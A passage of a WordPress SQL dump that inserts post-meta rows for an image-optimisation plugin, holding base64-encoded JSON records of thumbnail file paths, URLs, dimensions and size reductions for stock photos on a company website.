vdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NTUsInRpbWUiOjE0ODM1ODI2OTMsImlkIjo3NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5MjMsInRpbWUiOjE0ODM1ODI2OTgsImlkIjo3NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjM4NiwidGltZSI6MTQ4MzU4MjcwMSwiaWQiOjc1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDMyLCJ0aW1lIjoxNDgzNTgyNzA1LCJpZCI6NzU1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1ODI3MDgsImlkIjo3NTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU4MSwidGltZSI6MTQ4MzU4MjcxMiwiaWQiOjc1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NjQyLCJ0aW1lIjoxNDgzNTgyNzE2LCJpZCI6NzU1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30021, 754, 'wpfc_optimisation_reduction', '2625964'); 
INSERT INTO `wp_postmeta` VALUES (30022, 754, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQuanBnIiwid2lkdGgiOjQxNjQsImhlaWdodCI6Mjc3MSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQuanBnIiwicmVkdWN0aW9uIjoyNjI1OTUxLCJ0aW1lIjoxNDgzNTgyNzI4LCJpZCI6Ijc1NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzMwLCJpZCI6NzU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtODAweDUzMi5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTgwMHg1MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjczNCwiaWQiOjc1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC03Njh4NTExLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI3MzcsImlkIjo3NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0xNjAweDEwNjUuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTE2MDB4MTA2NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI3NDEsImlkIjo3NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzQzLCJpZCI6NzU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mjc0NiwiaWQiOjc1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI3NDgsImlkIjo3NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzUxLCJpZCI6NzU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzUzLCJpZCI6NzU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzU2LCJpZCI6NzU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzU4LCJpZCI6NzU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzYxLCJpZCI6NzU0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMTIxMzk4NC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTEyMTM5ODQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzExMjEzOTg0LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzY0LCJpZCI6NzU0fV0='); 
INSERT INTO `wp_postmeta` VALUES (30023, 753, 'wpfc_optimisation_reduction', '2625441'); 
INSERT INTO `wp_postmeta` VALUES (30024, 753, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDIuanBnIiwid2lkdGgiOjMyMzcsImhlaWdodCI6MjA1OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDIuanBnIiwicmVkdWN0aW9uIjoyNjI1NDI4LCJ0aW1lIjoxNDgzNTgyNzc1LCJpZCI6Ijc1MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzc4LCJpZCI6NzUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItODAweDUwOS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUwOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTgwMHg1MDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi04MDB4NTA5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mjc4MSwiaWQiOjc1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTc2OHg0ODkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi03Njh4NDg5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItNzY4eDQ4OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI3ODUsImlkIjo3NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0xNjAweDEwMTguanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTAxOCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTE2MDB4MTAxOC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTE2MDB4MTAxOC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI3ODksImlkIjo3NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8